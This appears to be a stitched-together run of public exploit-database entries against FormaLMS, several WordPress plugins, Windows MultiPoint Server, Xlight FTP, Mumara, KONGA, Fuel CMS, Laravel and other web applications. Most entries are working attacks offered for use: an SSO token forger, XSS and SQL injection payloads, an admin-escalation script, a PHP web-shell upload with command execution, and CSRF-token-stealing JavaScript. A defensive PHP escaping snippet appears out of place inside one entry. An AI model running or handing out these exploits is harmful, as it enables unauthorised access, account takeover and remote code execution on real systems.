# Analysis: https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
# Nuclei template: https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml

#!/usr/bin/env python
"""
The following exploit generates two URLs with an empty and with the fixed default value of the "secret".
For successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
"""
import sys
import time
import hashlib

# default value of the SSO secret shipped with the application
secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"


def help():
    print(f"Usage: {sys.argv[0]} username target_url")
    sys.exit()


if len(sys.argv) < 3:
    help()

user, url = (sys.argv[1], sys.argv[2])
# timestamp a little in the future so the token is still within its validity window
t = str(int(time.time()) + 5000)

# token = MD5("user,time,secret"), upper-cased hex
token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
print(f"URL with default secret: {final_url}")

token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
print(f"URL with empty secret: {final_url}")
-
WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
# Date: 11/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: http://www.wpsymposiumpro.com/
# Software Link: https://wordpress.org/plugins/wp-symposium-pro/
# Version: 2021.10
# Tested on : Windows 10

#Description: WP Symposium Pro version 2021.10 is exposed to a stored cross-site scripting vulnerability because the forum "name" field is not sanitized when a forum is added.

#Poc:

POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test
----------------------------------------------------------------------------------

## After adding the new forum, click the created forum and the pop-up will appear on the screen.
-
WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
# Date: 11/12/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
# Version: 1.8.2
# Tested on : Windows 10

#Poc:

1. Install the latest WordPress.
2. Install and activate AccessPress Social Icons 1.8.2.
3. Open the plugin in the left frame and go to the "add new" form. Click "Choose icon individually" and fill in the other fields.
4. Enter the JavaScript payload below into the 'icon title' field and click "Add Icon to list":
   <img src=x onerror=confirm('xss')>
5. The payload is stored in the database and the alert appears on the screen.
-
Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
# Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
# Date: 11/11/2021
# Exploit Author: it
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518
# Version: Version 6.1 Build 7601 Service Pack 1
# Tested on: Microsoft Windows MultiPoint Server 2011 - English Version

Description

Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache
Vulnerability Type: Privilege Escalation
Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Build 7601 Service Pack 1
OS Language: English

The Vulnerability

Clément wrote a very useful permissions-checking tool for Windows that finds various misconfigurations that could allow a local attacker to elevate privileges. On a typical Windows 7 and Server 2008 R2 machine, the tool found that all local users have write permissions on two registry keys:

HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

These did not immediately seem exploitable, but Clément did the legwork and found that the Windows Performance Monitoring mechanism can be made to read from these keys and eventually load a DLL provided by the local attacker. To most everyone's surprise, it does so not as the local user but as Local System.

In short, a local non-admin user creates a Performance subkey under one of the above keys, populates it with a few values, and triggers performance monitoring, which leads to a Local System WmiPrvSE.exe process loading the attacker's DLL and executing code from it.

Reference article: https://itm4n.github.io/windows-registry-rpceptmapper-eop/

I found that another version of Windows, Windows MultiPoint Server 2011, is also vulnerable, which can affect customers using an extended license; I cannot say whether there are other vulnerable, unpublished versions besides the ones I have posted here.

How to reproduce

Compile the Perfusion exploit in Visual Studio 2019: open the project, select Release x64 and build. The Microsoft Visual C++ Redistributable must be installed on Windows MultiPoint 2011 to run the exploit.

The exploit adds a Performance subkey under

HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

with the values

Library = name of your performance DLL
Open    = name of the Open function in your DLL
Collect = name of the Collect function in your DLL
Close   = name of the Close function in your DLL

and then triggers the DLL hijack, loading the payload DLL with SYSTEM privileges through WMI.

Tools and Exploit:
https://github.com/itm4n/PrivescCheck
Exploit: https://github.com/itm4n/Perfusion
-
Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)
# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-12
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link: https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.1
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)

# Steps to reproduce:
# 1. - Download and install Xlight FTP
# 2. - Run the python script; it creates the exploit.txt file.
# 3. - Open Xlight FTP 3.9.3.1
# 4. - "File and Directory -> Access Control List -> Setup -> Added users list directories"
# 5. - Go to "Specify file or directory name applied", "Specify username applied to" or "Specify groupname applied"
# 6. - Go to Setup -> Added -> Enter new Item and paste the characters
# 7. - Crashed

#!/usr/bin/python

# writes a 550-byte string of 'A' to exploit.txt for pasting into the dialog
exploit = 'A' * 550

try:
    file = open("exploit.txt", "w")
    file.write(exploit)
    file.close()
    print("POC is created")
except:
    print("POC not created")
-
WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
# Date: 20/08/2021
# Exploit Author: Davide Taraschi
# Vendor Homepage: https://wpschoolpress.com/
# Software Link: https://wpschoolpress.com/free-download/
# Version: up to 2.1.17 (not included)
# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
# CVE : CVE-2021-24664

# Description:
The plugin sanitises some fields using a WordPress built-in function called sanitize_text_field() but does not correctly escape them before outputting them in attributes, resulting in Stored Cross-Site Scripting issues. The function wp_sanitize_text_field() escapes < and > but does not escape characters like ", allowing an attacker to break out of an HTML input tag and inject arbitrary JavaScript.

# PoC:
As admin,

- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), tick the Absent box and put the following payload in the Reason:
  "style=animation-name:rotation onanimationstart=alert(/XSS/)//
  The XSS will be triggered when adding another teacher attendance by clicking on the Add button

- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason:
  " style=animation-name:rotation onanimationstart=alert(/XSS/)//
  The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button

- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field':
  " autofocus onfocus=alert(/XSS/)//
  The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)

- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field:
  " autofocus onfocus=alert(/XSS/)//
  The XSS will be triggered when editing the Subject

- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field:
  " autofocus onfocus=alert(/XSS/)//
  The XSS will be triggered when editing the Exam

Note that some of these XSS issues can be executed by a teacher (medium-privileged user), but since WordPress uses HttpOnly cookies it is impossible to steal cookies.
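The attribute-context mistake described in this advisory, as an added example that is not the plugin's code: a stand-in for sanitize_text_field() (strip_tags() is assumed here as an approximation of the tag removal the post describes), the unsafe rendering that drops the sanitised value straight into a value="" attribute, and the corrected rendering that escapes for the attribute context at output time (htmlspecialchars() with ENT_QUOTES; WordPress's esc_attr() does the equivalent job).

```php
<?php
// Added example, not WPSchoolPress code. Shows why a text sanitiser that keeps
// double quotes is not enough once the value is echoed inside an HTML attribute.

// Stand-in for sanitize_text_field(): strip_tags() is an assumed approximation of
// the tag removal the post describes. The double quote survives it untouched.
function sanitize_like_wp(string $value): string
{
    return trim(strip_tags($value));
}

// Vulnerable pattern: the sanitised value is concatenated into an attribute
// without attribute-context escaping, so a leading " closes the value.
function render_reason_unsafe(string $reason): string
{
    $clean = sanitize_like_wp($reason);
    return '<input type="text" name="reason" value="' . $clean . '">';
}

// Fixed pattern: sanitise on input if you like, but always escape on output.
// ENT_QUOTES encodes & < > " and ' so the value cannot leave the attribute.
function render_reason_safe(string $reason): string
{
    $clean = sanitize_like_wp($reason);
    $escaped = htmlspecialchars($clean, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="reason" value="' . $escaped . '">';
}

// Constructed input with the same shape as the payloads in the advisory.
$reason = '" autofocus onfocus=alert(/XSS/)//';

echo "unsafe: ", render_reason_unsafe($reason), PHP_EOL;
echo "safe:   ", render_reason_safe($reason), PHP_EOL;

// A quick self-check: the safe output must not contain a raw double quote
// anywhere other than the attribute delimiters themselves.
$safe = render_reason_safe($reason);
$inner = substr($safe, strlen('<input type="text" name="reason" value="'), -2);
echo (strpos($inner, '"') === false) ? "escaping ok" : "escaping FAILED", PHP_EOL;
```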
-
Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Date: 2021-11-11
# Exploit Author: (v0yager) Shain Lakin
# Vendor Homepage: https://mumara.com
# Version: <= 2.93
# Tested on: CentOS 7

-==== Vulnerability ====-

An SQL injection vulnerability in license_update.php in Mumara Classic through 2.93 allows a remote unauthenticated attacker to execute arbitrary SQL commands via the license parameter.

-==== POC ====-

Using SQLMap:

sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql
-
KONGA 0.14.9 - Privilege Escalation
# Exploit Title: KONGA 0.14.9 - Privilege Escalation
# Date: 10/11/2021
# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
# Vendor Homepage: https://github.com/pantsel/konga
# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
# Version: 0.14.9
# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)

import requests
import json

urlkonga = "http://www.example.com:1337/"  # change to your konga address
identifier = "usernormalkonga"  # change user
password = "changeme"  # change password

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Content-Type": "application/json;charset=utf-8",
    "connection-id": "",
    "Origin": urlkonga,
    "Referer": urlkonga
}

# Log in as the low-privileged user and keep the returned token and user id
url = urlkonga + "login"
data = {
    "identifier": identifier,
    "password": password
}

response = requests.post(url, json=data)
json_object = json.loads(response.text)
print("[+] Attack")
print("[+] Token " + json_object["token"])

url2 = urlkonga + "api/user/" + str(json_object["user"]["id"])
id = json_object["user"]["id"]
print("[+] Exploiting User ID " + str(json_object["user"]["id"]))

# Update the user's own record, including the admin field
data2 = {
    "admin": "true",
    "passports": {
        "password": password,
        "protocol": "local"
    },
    "password_confirmation": password,
    "token": json_object["token"]
}

print("[+] Change Normal User to Admin")
response2 = requests.put(url2, headers=headers, json=data2)
print("[+] Success")
-
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
# Date: 2021-04-11
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
# Version: 1.4.13
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46

Steps to Reproduce:
1. First, log in to your panel
2. Then go to the "Activity Log" menu
3. Then select any type option
4. The "col" parameter is vulnerable. Let's try to inject a Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in the "col=" parameter.

POC:
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date and (select * from(select(sleep(1)))a)&fuel_inline=0

Output:
By issuing sleep(0) the response will be delayed by 0 seconds.
By issuing sleep(1) the response will be delayed by 1 second.
By issuing sleep(5) the response will be delayed by 5 seconds.
By issuing sleep(10) the response will be delayed by 10 seconds.
-
Simple Subscription Website 1.0 - SQLi Authentication Bypass
# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
# Exploit Author: Daniel Haro (Dirox)
# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Version: Simple Subscription Website 1.0
# Tested on: Windows, xampp
# CVE: CVE-2021-43140

- Description:
SQL Injection vulnerability exists in Sourcecodester Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -

- PoC:

POST /plan_application/Actions.php?a=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 57
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/plan_application/admin/login.php
Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3

username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-
-
WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and press enter. XSS will trigger.
-
Online Learning System 2.0 - Remote Code Execution (RCE)
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580

#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style

init(autoreset=True)


def banner():
    print('''
    Online Learning System 2.0 - RCE

    Written by djebbaranon
    twitter : @dj3bb4ran0n1
    zone-h : http://zone-h.org/archive/notifier=djebbaranon
    ''')


banner()


def my_args():
    parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
    parser.add_argument("-u", "--url", type=str, required=True, help="url of target")
    parser.add_argument("-r", "--range", type=int, required=True, help="range for bruteforce the webshell name")
    parser.add_argument("-c", "--command", type=str, required=True, help="command to execute")
    my_arguments = parser.parse_args()
    return my_arguments


def login_with_sqli_login_bypass(user, passw):
    # Authenticate through the login form and keep the session cookie for later requests
    global session
    global url
    global cookies
    url = my_args().url
    session = requests.Session()
    data = {
        "username": user,
        "password": passw,
    }
    try:
        response = session.post(url + "/classes/Login.php?f=login", data=data, verify=False)
        print(Fore.GREEN + "[+] Logged in successfully")
        cookies = response.cookies.get_dict()
        print("[+] your cookie : {}".format(cookies))
    except requests.HTTPError as exception:
        print(Fore.RED + "[-] HTTP Error : {}".format(exception))
        sys.exit(1)


login_with_sqli_login_bypass("' or 1=1 -- -", "' or 1=1 -- -")


def main(shell_name, renamed_shell):
    try:
        payload = {
            "id": "",
            "faculty_id": "test",
            "firstname": "test",
            "lastname": "test",
            "middlename": "fsdfsd",
            "dob": "2021-10-29",
            "gender": "Male",
            "department_id": "1",
            "email": "zebi@gmail.com",
            "contact": "zebii",
            "address": "zebii",
        }
        files = {
            "img": (
                shell_name,
                "<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
                "application/octet-stream",
            )
        }
        vunlerable_file = "/classes/Master.php?f=save_faculty"
        print("[*] Trying to upload webshell ....")
        response_2 = session.post(url + vunlerable_file, data=payload, cookies=cookies, files=files)
        print("[+] trying to bruteforce the webshell ....")
        rangee = my_args().range
        # The upload is stored under a numeric name, so guess it within the given range
        for i in range(0, rangee):
            try:
                with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami", allow_redirects=False) as response3:
                    if "nikmok" in response3.text and response3.status_code == 200:
                        print("\n" + Fore.GREEN + "[+] shell found : " + response3.url + "\n")
                        with open("shell.txt", mode="w+") as writer:
                            writer.write(response3.url)
                        break
                    else:
                        print(Fore.RED + "[-] shell not found : " + response3.url)
            except requests.HTTPError as exception2:
                print("[-] HTTP Error : {0} ".format(exception2))
    except requests.HTTPError as error:
        print("[-] HTTP Error : {}".format(error))
    command = my_args().command
    with requests.get(response3.url.replace("whoami", command)) as response4:
        print("[*] Executing {} ....".format(command))
        time.sleep(3)
        print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)


main("hackerman.php", "")
-
PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass laravel image file upload functionality to upload arbitrary files on the web server
# which lets us run arbitrary javascript and bypass the csrf token. For more information read this one
https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:

1- Use HxD tool and add FF D8 FF E0 at the very beginning of your file

2- Use code below to bypass csrf token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    }

    // xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tells it to return it as a HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
    // Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            page = xhr.response
            // Get the input element
            input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}

var POST_URL = "/";
getTokenJS();
</script>
</body>
</html>

3- Save it as Html file and upload it.